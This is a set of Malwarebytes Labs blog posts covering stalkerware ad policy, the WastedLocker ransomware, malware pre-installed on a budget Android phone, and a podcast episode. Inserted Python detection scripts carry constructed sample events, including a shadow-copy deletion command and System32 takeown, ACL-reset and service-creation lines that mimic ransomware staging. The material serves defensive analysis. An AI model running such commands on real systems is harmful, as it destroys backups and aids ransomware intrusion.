In responding to a question as to why Google decided to announce this update now, a spokesperson said: “We constantly evaluate and update our ad policies to ensure we are protecting users. We routinely update our language with examples to help clarify what we consider policy violating. Spyware technology for partner surveillance was always in scope of our policies against dishonest behavior.”

The updated policy applies to “spyware and technology used for intimate partner surveillance including but not limited to spyware/malware that can be used to monitor texts, phone calls, or browsing history; GPS trackers specifically marketed to spy or track someone without their consent;” and “promotion of surveillance equipment (cameras, audio recorders, dash cams, nanny cams) marketed with the express purpose of spying.”

The non-exhaustive list captures some of the current types of invasive tools available today. But further down in its policy update, Google explained that there are exceptions to the new rule. The policy will not apply to “private investigation services” or “products or services designed for parents to track or monitor their underage children.”

The problem, as we reported nearly one year ago on Malwarebytes Labs, is that the line between stalkerware-type applications and parental monitoring applications can be blurred.

As we wrote before:

“Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that, not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, the capabilities themselves can be found within the type of hacking tools used by nation states.

‘If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,’ Roane said. ‘Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.’”

What’s more is that sometimes, apps that previously marketed themselves as tools for potentially spying on romantic partners and spouses can then quickly turn around and masquerade as parental monitoring apps.

Erica Olsen, director of the Safety Net project for the National Network to End Domestic Violence, said she personally saw these “rebranding” tactics herself when then-Senator Al Franken introduced legislation to prohibit the use of apps which could reveal a person’s GPS location without their knowledge or consent.

“After the public legislative hearings Al Franken held on location-based apps and stalking products, a ton of them changed their marketing almost overnight,” said Olsen, who also shared that Google’s updated policy is a move in the right direction. “We held up large, blown-up images of their problematic marketing and they removed it. But they didn’t change the basic functionality of the apps that allowed them to be used for these behaviors. That spoke volumes.”

Last year, Twitter allowed sponsored tweets that advertised an app that can track call logs, text messages, GPS location, web browsing history, and social media activity, and reveal sensitive photos and videos. The advertisement portrayed a man lying down in bed, checking his phone. Written across the advertisement were the words: “What is she hiding from you?”

Twitter took the advertisement down after users grew incensed. According to VICE, Twitter explained its takedown by saying: “The app violates our Malware and Software Download Policy and will no longer be allowed to advertise on the platform.”

This was a swift move by Twitter, but today, that same app markets itself on its own website as a tool for parental monitoring.

On Friday, computer security writer Graham Cluley raised the same issues we are raising here—that some stalkerware-type apps may still be able to advertise on Google, simply by changing their advertising strategy.

“Sadly, I doubt Google’s ad ban will stop stalkerware apps from promoting themselves,” Cluley wrote, “it’s just they may no longer be able to be quite so explicit in their online adverts about how they are most likely to be used.”

Next steps against stalkerware

As a founding partner in the Coalition Against Stalkerware, Malwarebytes understands that the threats of stalkerware are multifaceted, and responding to these threats requires cross-disciplinary support. That includes the commitment of online advertising platforms to remove spaces for companies that deliberately advertise the potential to invade someone’s privacy as a product feature.

Despite the carve-outs to Google’s updated advertising policy, the company’s overall intention here is good.

Our commitment to protecting users from the threats of stalkerware-type apps continues. We welcome others to join.


A week in security (July 6 – 12)

Last week on Malwarebytes Labs, we took an in-depth look at card skimmers targeting ASP sites, we released another episode of Lock and Code exploring the Internet of Things, and we dug into a Mac mystery. We also examined some pre-installed malware, and put out a threat spotlight on some customized ransomware.

Other cybersecurity news

Stay safe, everyone!


Threat spotlight: WastedLocker, customized ransomware

WastedLocker is a new ransomware operated by a malware exploitation gang commonly known as the Evil Corp gang, the same gang that is associated with Dridex and BitPaymer.

The attribution is not based on the malware code itself, as WastedLocker is very different from BitPaymer. What was kept is the ability to add specific modules for different targets.

The attacks performed using WastedLocker are highly targeted at very specific organizations. It is suspected that during a first penetration attempt an assessment of active defenses is made and the next attempt will be specifically designed to circumvent the active security software and other perimeter protection.

The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string “wasted”.

For each encrypted file, the attackers create a separate file that contains the ransomware note. The ransom note has the same name as the associated file with the addition of “_info”.


The ransom demands are steep, ranging from $500,000 to over $10 million in Bitcoin. Given that the operators make every effort to go after any backups, some organizations may feel the need to pay up. Where other ransomware operators are adding the exfiltration and even auction of stolen data to their arsenal, the Evil Corp gang has shown no inclination in that direction yet.

Historically the Evil Corp gang targets mostly US organizations and it looks like they are staying on that track with a few victims in Europe. The main players in the group are believed to be Russian.

The importance of offline backups

In general, we can state that if this gang has found an entrance into your network, it will be impossible to stop them from encrypting at least part of your files. The only thing that can help you salvage your files in such a case is having either roll-back technology or a form of offline backups. With online, or otherwise connected, backups you run the chance of your backup files being encrypted as well, which makes the whole point of having them moot. Please note that roll-back technologies rely on the activity of the processes monitoring your systems, and the danger exists that these processes will be on the target list of the ransomware gang, meaning that they will be shut down once the attackers gain access to your network.

As you may have noticed, this is a very sophisticated and highly targeted type of ransomware, which means that, given the ransom demands, most of the affected companies will have a dedicated cybersecurity department. It is imperative that this staff is alert to the early warning signs of these attacks, which may be indicated by breach attempts. At later stages more disruptive actions may be taken, such as disabled security software, dropped files, and deleted backups.

Unlike other ransomware operators Evil Corp does not exfiltrate stolen data and publish or auction the data that belong to “clients” that are unwilling to pay the ransom.

Infection details

One of the methods found to date is the usage of fake software update alerts embedded in existing websites.

Code can be inserted on existing websites showing misleading information to prompt users and get them to run malware.

The malware from these websites is a penetration testing and exploration kit designed to create a foothold and gather information about the network. Historically Evil Corp has targeted file servers, database services, virtual machines, and cloud environments.

Once the exploration phase has completed the gang will drop the ransomware on the compromised systems.

The ransomware itself is custom built for each client so there is nothing to be gained by doing a full analysis. The attacks do have some commonalities though which we will discuss here.

  • Deletes shadow copies, which are the default backups made by the Windows OS.
  • The main executable for the ransomware is copied to the system folder and gets elevated permissions.
  • A service is created that runs during encryption.
  • During encryption the encrypted files are renamed, and the ransom notes are created.
  • A log file is created that lists the number of targeted files, the number of encrypted files, and the number of files that were not encrypted due to access rights issues.
  • The service is stopped and deleted.

Overview

  • WastedLocker has been actively deployed since May 2020.
  • Evil Corp is behind it: this group was previously associated with the Dridex malware and BitPaymer, aka IEcrypt, aka FriedEx, aka WastedLocker.
  • Evil Corp has been using WastedLocker to request ransoms in the range of millions of USD, with some demands going above $10 million.
  • WastedLocker replaces BitPaymer in the group’s operations.
  • Technically, WastedLocker does not have much in common with BitPaymer.
  • The ransomware name is derived from the filename it creates, which includes an abbreviation of the victim’s name and the string ‘wasted’.
  • The encrypted file extension is set according to the targeted organisation’s name along with the string wasted.
  • Example: test.txt.orgnamewasted (encrypted data) and test.txt.orgnamewasted_info (ransomware note)
  • No data theft and no leak site.
  • Each ransomware victim has a custom build configured or compiled for them.
  • The note contains Protonmail and Tutanota email domains, as well as Eclipso and Airmail email addresses. The email addresses listed in the ransom messages are numeric, usually 5-digit numbers.

Infection highlights

  • Delete shadow copies.
  • Copy the ransomware binary file to %windir%\system32, take ownership of it (takeown.exe /F filepath) and reset the ACL permissions. In other cases an Alternate Data Stream (ADS) is used as a means to run the ransomware processes.
  • Create and run a service. The service is deleted once the encryption process is completed.
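The stages listed above can be turned into detection logic over process-creation telemetry. The following is an added example written for this post, not code from Malwarebytes or from the WastedLocker analysis: it tags constructed Sysmon-style records (host, image path, command line) with the stage each one matches and flags any host where several stages show up together. The post itself names takeown.exe and ADS use; the vssadmin, icacls and sc.exe command lines are my assumptions about the tooling behind "delete shadow copies", "reset the ACL permissions" and "create and run a service", and every sample event is constructed.

```python
import re
from collections import defaultdict

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# Windows Security 4688 fields. Sample inputs for this example, not telemetry.
SAMPLE_EVENTS = [
    {"host": "fs01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "fs01", "image": r"C:\Windows\System32\takeown.exe",
     "cmdline": r"takeown.exe /F C:\Windows\System32\svcupd.exe"},
    {"host": "fs01", "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r"icacls.exe C:\Windows\System32\svcupd.exe /reset"},
    {"host": "fs01", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc.exe create svcupd binPath= C:\Windows\System32\svcupd.exe"},
    {"host": "fs01", "image": r"C:\Windows\System32\svcupd.exe:bin",
     "cmdline": r"C:\Windows\System32\svcupd.exe:bin"},
    # Benign administration on another host: a service query and an ACL reset
    # on a user folder. Neither should produce a tag.
    {"host": "ws07", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc.exe query spooler"},
    {"host": "ws07", "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": r"icacls.exe C:\Users\jdoe\Documents /reset /T"},
]

# Stages in the order the post lists them; used to sort the output.
STAGE_ORDER = ["shadow_copy_deletion", "takeown_system32",
               "acl_reset_system32", "service_created", "ads_execution"]

SYSTEM32 = re.compile(r"(?i)[a-z]:\\windows\\system32\\")


def classify_event(ev):
    """Return the set of stage tags a single process-creation event matches."""
    image, cmd = ev["image"], ev["cmdline"]
    # Basename of the image without any ADS suffix (file.exe:stream -> file.exe).
    exe = image.rsplit("\\", 1)[-1].split(":")[0].lower()
    tags = set()
    # Shadow copy deletion. Tooling assumed; the post only says copies are deleted.
    if exe == "vssadmin.exe" and re.search(r"(?i)delete\s+shadows", cmd):
        tags.add("shadow_copy_deletion")
    if exe == "wmic.exe" and re.search(r"(?i)shadowcopy\s+delete", cmd):
        tags.add("shadow_copy_deletion")
    # takeown.exe /F on a file under %windir%\System32 (named in the post).
    if exe == "takeown.exe":
        m = re.search(r"(?i)/F\s+(\S+)", cmd)
        if m and SYSTEM32.search(m.group(1)):
            tags.add("takeown_system32")
    # ACL reset on a System32 file. icacls assumed as the tool.
    if exe == "icacls.exe" and re.search(r"(?i)\s/reset\b", cmd) and SYSTEM32.search(cmd):
        tags.add("acl_reset_system32")
    # Service creation. sc.exe assumed as the tool.
    if exe == "sc.exe" and re.search(r"(?i)\bcreate\b", cmd):
        tags.add("service_created")
    # Execution from an Alternate Data Stream: a second colon in the image path
    # after the drive letter (file.ext:streamname). Heuristic.
    if image.count(":") > 1:
        tags.add("ads_execution")
    return tags


def score_hosts(events, min_stages=2):
    """Group tags by host; return hosts showing at least min_stages distinct stages."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]] |= classify_event(ev)
    return {h: sorted(s, key=STAGE_ORDER.index)
            for h, s in seen.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, stages in score_hosts(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(stages))
```

A single tag (an admin running icacls, a legitimate service install) is noise on its own; the host-level aggregation is what turns the post's list of commonalities into something worth paging on.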

IOCs

*wasted and *wasted_info filenames for encrypted files and the ransom notes

Basic layout of the content of the ransom note:

*ORGANIZATION_NAME*
YOUR NETWORK IS ENCRYPTED NOW
USE *EMAIL1* | *EMAIL2* TO GET THE PRICE FOR YOUR DATA
DO NOT GIVE THIS EMAIL TO 3RD PARTIES
DO NOT RENAME OR MOVE THE FILE
THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:
[begin_key]*[end_key]
KEEP IT

The email addresses are usually numeric and 5 digits, one at Protonmail and the other at Airmail, but we have also seen Tutanota and Eclipso email addresses.
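For an incident responder, the indicators above (the *wasted / *wasted_info filename pair and the fixed note layout) lend themselves to a triage script. The following is an added example, not code from the post or from Malwarebytes: it sweeps a directory tree for encrypted files, pairs each with its note, parses the note against the layout shown above and checks the addresses for the numeric-at-a-listed-provider pattern. The provider match is a heuristic (the post names the providers, not the exact domains), and the sample tree, organisation name, addresses and key block are constructed placeholders.

```python
import os
import re
import tempfile

# The ransom note layout from the post, expressed as a regex. The organisation
# name, both contact addresses and the key block are captured.
NOTE_RE = re.compile(
    r"^(?P<org>[^\r\n]+)\r?\n"
    r"YOUR NETWORK IS ENCRYPTED NOW\r?\n"
    r"USE (?P<email1>\S+) \| (?P<email2>\S+) TO GET THE PRICE FOR YOUR DATA\r?\n"
    r"DO NOT GIVE THIS EMAIL TO 3RD PARTIES\r?\n"
    r"DO NOT RENAME OR MOVE THE FILE\r?\n"
    r"THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r?\n"
    r"\[begin_key\](?P<key>.*?)\[end_key\]\r?\n"
    r"KEEP IT\s*$",
    re.S,
)

# Providers the post names, matched as substrings of the domain because the
# exact domains are not given (heuristic, an assumption of this example).
PROVIDERS = ("protonmail", "tutanota", "eclipso", "airmail")


def suspicious_email(addr):
    """True for the pattern the post describes: an all-numeric local part
    (usually 5 digits) at one of the listed providers."""
    m = re.fullmatch(r"\d+@([^@\s]+)", addr)
    return bool(m) and any(p in m.group(1).lower() for p in PROVIDERS)


def parse_ransom_note(text):
    """Return the note's fields if it matches the layout, else None."""
    m = NOTE_RE.match(text)
    if not m:
        return None
    emails = [m.group("email1"), m.group("email2")]
    return {
        "org": m.group("org").strip(),
        "emails": emails,
        "emails_match_pattern": all(suspicious_email(e) for e in emails),
        "key": m.group("key").strip(),
    }


def sweep(root):
    """Walk a tree, pair every *wasted file with its *wasted_info note and
    parse the note. Returns findings sorted by path."""
    findings = []
    for dirpath, _, files in os.walk(root):
        present = set(files)
        for name in files:
            if not name.endswith("wasted"):
                continue
            note_name = name + "_info"
            note_path = os.path.join(dirpath, note_name) if note_name in present else None
            parsed = None
            if note_path:
                with open(note_path, encoding="utf-8", errors="replace") as fh:
                    parsed = parse_ransom_note(fh.read())
            findings.append({
                "file": os.path.join(dirpath, name),
                "extension": name.rsplit(".", 1)[-1],  # e.g. orgnamewasted
                "note": note_path,
                "note_parsed": parsed,
            })
    return sorted(findings, key=lambda f: f["file"])


# Constructed sample note: organisation, addresses and key are placeholders.
SAMPLE_NOTE = (
    "CONSTRUCTED ORG\n"
    "YOUR NETWORK IS ENCRYPTED NOW\n"
    "USE 12345@protonmail.example | 67890@airmail.example TO GET THE PRICE FOR YOUR DATA\n"
    "DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n"
    "DO NOT RENAME OR MOVE THE FILE\n"
    "THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\n"
    "[begin_key]CONSTRUCTED-KEY-BLOB-0123[end_key]\n"
    "KEEP IT\n"
)


def _write(path, data):
    if isinstance(data, bytes):
        with open(path, "wb") as fh:
            fh.write(data)
    else:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(data)


def run_demo():
    """Build a constructed tree in a temp dir and sweep it: one encrypted file
    with its note, one without a note, and one clean file."""
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "docs")
        os.makedirs(docs)
        _write(os.path.join(docs, "budget.xlsx.orgnamewasted"), b"\x00" * 64)
        _write(os.path.join(docs, "budget.xlsx.orgnamewasted_info"), SAMPLE_NOTE)
        _write(os.path.join(docs, "readme.txt.orgnamewasted"), b"\x00" * 16)
        _write(os.path.join(docs, "report.pdf"), b"%PDF-1.4")
        return sweep(root)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding["file"], finding["extension"], finding["note_parsed"])
```

The extension field groups hits by victim abbreviation, which is how you notice when a second organisation's suffix turns up on a file server that should only hold your own data.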

Malwarebytes detection

Malwarebytes detects WastedLocker ransomware as Ransom.BinADS.

Ransom.BinADS detections in Nebula

Stay safe everyone!

The post Threat spotlight: WastedLocker, customized ransomware appeared first on Malwarebytes Labs.

We found yet another phone with pre-installed malware via the Lifeline Assistance program

We have discovered, yet again, another phone model with pre-installed malware provided through the Lifeline Assistance program via Assurance Wireless by Virgin Mobile. This time, it is an ANS (American Network Solutions) UL40 running Android OS 7.1.1.

After our writing back in January—“United States government-funded phones come pre-installed with unremovable malware”—we heard an outcry from Malwarebytes patrons. Some claimed that various ANS phone models were experiencing similar issues to the UMX (Unimax) U683CL. However, it’s very hard to verify such cases without physically having the mobile device in hand. For this reason, I could not confidently write about such cases publicly. Thankfully, we had one Malwarebytes patron committed to proving his case. Thank you to Malwarebytes patron Rameez H. Anwar for sending us your ANS UL40 for further research! Your cybersecurity expertise and persistence in this case will surely aid others!

Clarification of availability

To clarify, it is unclear whether the phone in question, the ANS UL40, is currently available from Assurance Wireless. However, the ANS UL40 User Manual is listed (at the time of this writing) on the Assurance Wireless website.


Therefore, we can only assume it is still available to Assurance Wireless customers. Regardless, the ANS UL40 was sold at some point and some customers could still be affected.

Infection types

Just like the UMX U683CL, the ANS UL40 comes infected with a compromised Settings app and Wireless Update app. Although this may be true, they are not infected with the same malware variants. The infections are similar but have their own unique infection characteristics. Here’s a rundown of the infected apps.

Settings


The Settings app is exactly what it sounds like—it is the required system app used to control all the mobile device’s settings. Thus, removing it would leave the device unusable. For the case of the ANS UL40, it is infected with Android/Trojan.Downloader.Wotby.SEK.

Proof of infection is based on several similarities to other variants of Downloader Wotby. Although the infected Settings app is heavily obfuscated, we were able to find identical malicious code. Additionally, it shares the same receiver name: com.sek.y.ac; service name: com.sek.y.as; and activity names: com.sek.y.st, com.sek.y.st2, and com.sek.y.st3. Some variants also share a text file found in the assets directory named wiz.txt. It appears to be a list of “top apps” to download from a third-party app store. Here’s a snippet of code from the text file.

(Image: code snippet from wiz.txt)

To be fair, no malicious activity triggered for us from this infected Settings app. We were expecting to see some kind of notification or browser popup populated with info from the code above displayed. Unfortunately, that never happened. But we also didn’t spend the normal amount of time a typical user would on the mobile device. Nor was a SIM card installed into the device, which could impact how the malware behaves. Nevertheless, there is enough evidence that this Settings app has the ability to download apps from a third-party app store. This is not okay. For this reason, the detection stands.

Although unsettling, it’s important to note that the apps from the third-party app store appear to be malware-free. This was verified by manually downloading a couple for ourselves for analysis. That’s not to say that malicious versions couldn’t be uploaded at a later date. Nor did we verify every sample. Nevertheless, we believe the sample set we did verify holds true for other apps on the site. Under those circumstances, even if the ANS’s Settings app had downloaded an app from the list, it’s still not as nefarious as the Settings app seen on the UMX U683CL.

WirelessUpdate

  • Package Name: com.fota.wirelessupdate
  • MD5: 282C8C0F0D089E3CD522B4315C48E201
  • App Name: WirelessUpdate
  • Detections: Three variants of Android/PUP.Riskware.Autoins.Fota
    • Variants .INS, .fscbv, and .fbcv

WirelessUpdate is categorized as a Potentially Unwanted Program (PUP) riskware auto-installer that has the ability to auto-install apps without user consent or knowledge. It also functions as the mobile device’s main source of security patches, OS updates, etc.

Android/PUP.Riskware.Autoins.Fota in particular is known for installing various variants of Android/Trojan.HiddenAds—and indeed it did! In fact, it auto installed four different variants of HiddenAds as seen below!

  • Package Name: com.covering.troops.merican
  • MD5: 66C7451E7C87AD5145596012C6E9F9A0
  • App Name: Merica
  • Detection: Android/Trojan.HiddenAds.MERI

  • Package Name: com.sstfsk.cleanmaster
  • MD5: 286AB10A7F1DDE7E3A30238D1D61AFF4
  • App Name: Clean Master
  • Detection: Android/Trojan.HiddenAds.BER

  • Package Name: com.sffwsa.fdsufds
  • MD5: 4B4E307B32D7BB2FF89812D4264E5214
  • App Name: Beauty
  • Detection: Android/Trojan.HiddenAds.SFFW

  • Package Name: com.slacken.work.mischie
  • MD5: 0FF11FCB09415F0C542C459182CCA9C6
  • App Name: Mischi
  • Detection: Android/Trojan.HiddenAds.MIS
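To check a device against the indicators listed above, here is an added example that is not code from the post or from Malwarebytes. It parses the output of `adb shell pm list packages -f`, matches installed packages against the package names and MD5s given in the post, verifies a pulled APK's hash, and generates the per-user uninstall command the post gives further down for WirelessUpdate. The `pm list` output and the APK paths in it are constructed; the package names, hashes and detection names are the post's.

```python
import hashlib

# Package names, MD5s and detection names exactly as listed in the post.
KNOWN_BAD = {
    "com.fota.wirelessupdate":     ("282C8C0F0D089E3CD522B4315C48E201", "Android/PUP.Riskware.Autoins.Fota"),
    "com.covering.troops.merican": ("66C7451E7C87AD5145596012C6E9F9A0", "Android/Trojan.HiddenAds.MERI"),
    "com.sstfsk.cleanmaster":      ("286AB10A7F1DDE7E3A30238D1D61AFF4", "Android/Trojan.HiddenAds.BER"),
    "com.sffwsa.fdsufds":          ("4B4E307B32D7BB2FF89812D4264E5214", "Android/Trojan.HiddenAds.SFFW"),
    "com.slacken.work.mischie":    ("0FF11FCB09415F0C542C459182CCA9C6", "Android/Trojan.HiddenAds.MIS"),
}

# Constructed output of `adb shell pm list packages -f`; the APK paths are made up.
SAMPLE_PM_OUTPUT = """package:/system/priv-app/Settings/Settings.apk=com.android.settings
package:/system/app/WirelessUpdate/WirelessUpdate.apk=com.fota.wirelessupdate
package:/data/app/com.covering.troops.merican-1/base.apk=com.covering.troops.merican
package:/data/app/com.sstfsk.cleanmaster-1/base.apk=com.sstfsk.cleanmaster
package:/data/app/com.example.weather-1/base.apk=com.example.weather
"""


def parse_pm_list(output):
    """Parse `pm list packages` output (with or without -f) into {package: apk_path_or_None}."""
    result = {}
    for line in output.splitlines():
        line = line.strip()
        if not line.startswith("package:"):
            continue
        body = line[len("package:"):]
        if "=" in body:                      # -f form: path=package
            path, pkg = body.rsplit("=", 1)
            result[pkg] = path
        else:                                # plain form: package only
            result[body] = None
    return result


def match_known_bad(installed):
    """Sorted list of installed package names that appear in the post's indicator list."""
    return sorted(pkg for pkg in installed if pkg in KNOWN_BAD)


def md5_hex(data):
    return hashlib.md5(data).hexdigest().upper()


def hash_matches(apk_bytes, package):
    """True if the APK bytes (e.g. after `adb pull`) hash to the MD5 the post lists."""
    expected, _ = KNOWN_BAD[package]
    return md5_hex(apk_bytes) == expected


def removal_commands(packages):
    """Uninstall for user 0 only, keeping app data (-k) so the app can be restored
    later, as the post's removal instructions describe."""
    return [f"adb shell pm uninstall -k --user 0 {p}" for p in packages]


if __name__ == "__main__":
    installed = parse_pm_list(SAMPLE_PM_OUTPUT)
    for pkg in match_known_bad(installed):
        print(pkg, "->", KNOWN_BAD[pkg][1], "at", installed[pkg])
    for cmd in removal_commands(match_known_bad(installed)):
        print(cmd)
```

A package-name match alone is weaker than a hash match, since a clean app can reuse a name; pull the APK and run the hash check before acting on the name, and keep WirelessUpdate's removal reversible because it is also the device's update channel.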

Payload drop verification

Now you might be wondering, “How did you verify which of the two pre-installed infected system apps is dropping the payloads?” The process works as follows. You disable one of them upon initially setting up the mobile device. In both the UMX and ANS cases, picking which one to disable was easy to decide. That’s because disabling the Settings app renders the phone unusable. So, disabling WirelessUpdate was the obvious choice in both cases. The next step in the process is waiting a couple of weeks to see if anything happens. And yes, you sometimes need to wait this long for the malware to drop payloads. If nothing happens after a couple of weeks, then it’s time to re-enable the infected system app again and start the waiting game all over.

Using this process, we found in the case of the UMX U683CL, the Settings app was the culprit. For the ANS UL40, after not seeing any dropped payload(s) for weeks, I re-enabled WirelessUpdate. Within 24 hours, it installed the four HiddenAds variants! Caught red-handed, WirelessUpdate!

The tie between UMX and ANS

With our findings, we imagine some are left wondering: is this a correlation or a coincidence? We know that both the UMX and ANS mobile devices have the same infected system apps. However, the malware variants on the U683CL model and the UL40 are different. As a result, I initially didn’t think there was any tie between the two brands. I summed it up as a coincidence rather than a correlation. That is, until I stumbled upon evidence suggesting otherwise.

The Settings app found on the ANS UL40 is signed with a digital certificate with the common name teleepoch. Searching for teleepoch turns up the company TeleEpoch Ltd along with a link to its website. Right there on the homepage of TeleEpoch Ltd it states: Teleepoch registered brand “UMX” in the United States.

Let’s review. We have a Settings app found on an ANS UL40 with a digital certificate signed by a company that is a registered brand of UMX. For the scoreboard, that’s two different Settings apps with two different malware variants on two different phone manufacturers and models that appear to all tie back to TeleEpoch Ltd. Additionally, thus far the only two brands found to have preinstalled malware in the Settings app via the Lifeline Assistance program are ANS and UMX.

This led me to do further research into the correlation by looking at cases in our support system of other ANS models that might have preinstalled malware. That’s when I found the ANS L51. For the record, the L51 was another model reported as having preinstalled malware within the comments of the UMX article in January. I discovered that the ANS L51 had the same exact malware variants as the UMX U683CL! There, within previous support tickets, was hard proof of the ANS L51 infected with Android/Trojan.Dropper.Agent.UMX and Android/PUP.Riskware.Autoins.Fota.fbcvd. Driving home the TeleEpoch, UMX, and ANS correlation!

Solutions

We have the utmost faith that ANS will quickly find a resolution to this issue, just as UMX did, as stated in the UPDATE: February 11, 2020 section of the January writing. As a silver lining, we did not find the Settings app on the ANS to be nearly as vicious as on the UMX. Thus, the urgency is not as severe this time around.

In the meantime, frustrated users with the ANS UL40 can halt the reinfection of HiddenAds by using this method to uninstall WirelessUpdate for the current user (details in link below):

Removal instructions for Adups

Warning: Make sure to read Restoring apps onto the device (without factory reset) in the rare case you need to revert/restore an app. For instance, if you would like to restore WirelessUpdate to check if there are important system updates.

Use this/these command(s) during step 7 under Uninstalling Adups via ADB command line to remove:

adb shell pm uninstall -k --user 0 com.fota.wirelessupdate

Budget should not equate to malware

There are tradeoffs when choosing a budget mobile device. Some expected tradeoffs are performance, battery life, storage size, screen quality, and a list of other things, in order to make a mobile device light on the wallet.

However, budget should never mean compromising one’s safety with pre-installed malware. Period.

The post We found yet another phone with pre-installed malware via the Lifeline Assistance program appeared first on Malwarebytes Labs.

Lock and Code S1Ep10: Pulling apart the Internet of Things with JP Taggart

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to JP Taggart, senior security researcher at Malwarebytes, about the Internet of Things.

For years, Internet capabilities have crept into modern consumer products, providing sometimes convenient, sometimes extraneous Internet connectivity. This increase in IoT devices has an obvious outcome—a broader attack surface for threat actors. Not only that, but with more devices connecting to the Internet, there are also more devices collecting your data and analyzing it to send you more ads, more frequently, for more products.

Tune in to hear about the development of IoT devices, their cybersecurity and data privacy lapses, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

  • Of Bluetooth and beacons: We took a look at how companies use Bluetooth to track you and use that capability for their benefit.
  • A malicious installer of the Little Snitch app was brought to our attention, and it happens to be a new Mac ransomware we now call ThiefQuest.
  • The Chromebook, they say, is a system that doesn’t need antivirus protection. Or does it? We took a deep dive into this claim to see if it truly holds water.

Plus other cybersecurity news:

  • Another ransomware attack struck a school, this time the University of California, which admitted to paying the ransom to the tune of 1.4 USD. (Source: Computer Business Review)
  • A known APT threat actor called Promethium, aka StrongPity, was spotted by multiple security researchers pushing Trojanized installers that mimic legitimate programs to target countries, including India and Canada, for intelligence gathering. (Source: ZDNet)
  • Website owners and bloggers, beware! There’s a “secure DNS” scam making the rounds, purporting to “help” you. (Source: Sophos’s Naked Security Blog)
  • Attackers compromised several US newspaper websites, and then used them as launchpads to distribute code that allows for the downloading of ransomware to visitors, most of which are huge organizations. (Source: Dark Reading)
  • TrickBot, a nefarious and very tricky Trojan, has a new quirk: it checks the screen resolution spec of the victim machine to identify whether it is running on a virtual machine or not. (Source: BleepingComputer)

Stay safe, everyone!

The post Lock and Code S1Ep10: Pulling apart the Internet of Things with JP Taggart appeared first on Malwarebytes Labs.